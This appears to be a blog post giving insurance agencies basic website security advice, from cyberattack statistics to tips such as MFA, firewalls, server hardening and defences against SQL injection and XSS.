Protecting Your Insurance Agency from Cyber Attacks

Protecting Your Insurance Agency from Cyber Attacks

Protecting Your Insurance Agency from Cyber Attacks 2560 1707 Andrew

Cyberattacks are on the rise, so it’s no surprise that cyber insurance continues to be one of the fastest growing areas in the insurance industry. For insurance agencies, there are two sides to this issue: opportunity for cyber insurance related growth, and the potential for a malicious cyberattack against their own agency website. Consider some of these cyber stats:

  • The average cost of a ransomware attack was $1.85 million in 2020, doubling the year before at $761,106. (Sophos, 2021)
  • Data breaches exposed 36 billion records in the first half of 2020.
  • 45% of breaches featured hacking, 17% were malware related and 22% involved phishing.
  • 88% of organizations worldwide experienced phishing attempts (2019).
  • Between 2005 and 2020, there have been over 11,000 recorded breaches.
  • The top malicious email attachment types are .doc and .dot (37%), the next is .exe (19.5%).

How can you make your insurance agency website more secure and limit your exposure to a cyberattack or breach?

The Basics

  • Install SSL. This is a mandatory step for all websites!
  • Update your software frequently. This includes your operating environment, coding, theme, plugins, etc.
  • Use complex passwords. All passwords for all user access to your website should be complex. It’s often best to use the computer-generated passwords provided by your system.
  • Educate your users. Take the time to ensure all employees and contractors understand cyber security best practices including preventing phishing emails and other hacking emails.
  • Use anti-malware solutions. Invest in anti-malware solutions for ongoing scans to and prevent malicious attacks.


  • Harden your server. Server hardening is a set of techniques used to improve the security of your server. For example, you should manage server access, minimize the external footprint (including hiding key files from public view), patch vulnerabilities, restrict admin access and minimized user access permissions.
  • Use parameter queries to mitigate SQL injection attacks.
  • Multifactor authentication should be used for login security. MFA is an excellent addition to your security protocol, and authenticator apps like LastPass, Microsoft Authenticator, and Google Authenticator are easy to use. They reside on your smartphone and allow you to enter a 6-digit code to validate secure login.
  • Add a firewall. Most hosting environments offer a firewall option, and you should take advantage of this. For example, GoDaddy offers an optional Securi firewall to help prevent hacking attempts. These are an inexpensive addition and should be a standard. Note that you will need to change your DNS A record when adding a firewall.
  • Protect against XSS attacks. Cross-site scripting (XSS) attacks can inject malicious JavaScript into your insurance agency web pages, which can change browser page content, or potentially steal information. The best defense is to limit how and what JavaScript is executed in the page. For example, your website can disallow the running of any non-hosted scripts (disallow inline JavaScript).
  • Manually accept on-site comments. Don’t allow comments to automatically post, this cuts down on spam and script attacks.
  • Use captchas. Every form should have a captcha, and in the event of cookie compliance captcha issues, create a mandatory field which requires the user to decide something. For example, 5+4=___).
  • Encrypt data. If you’re capturing information of any kind, or as a general safeguard, encrypt your data while at rest.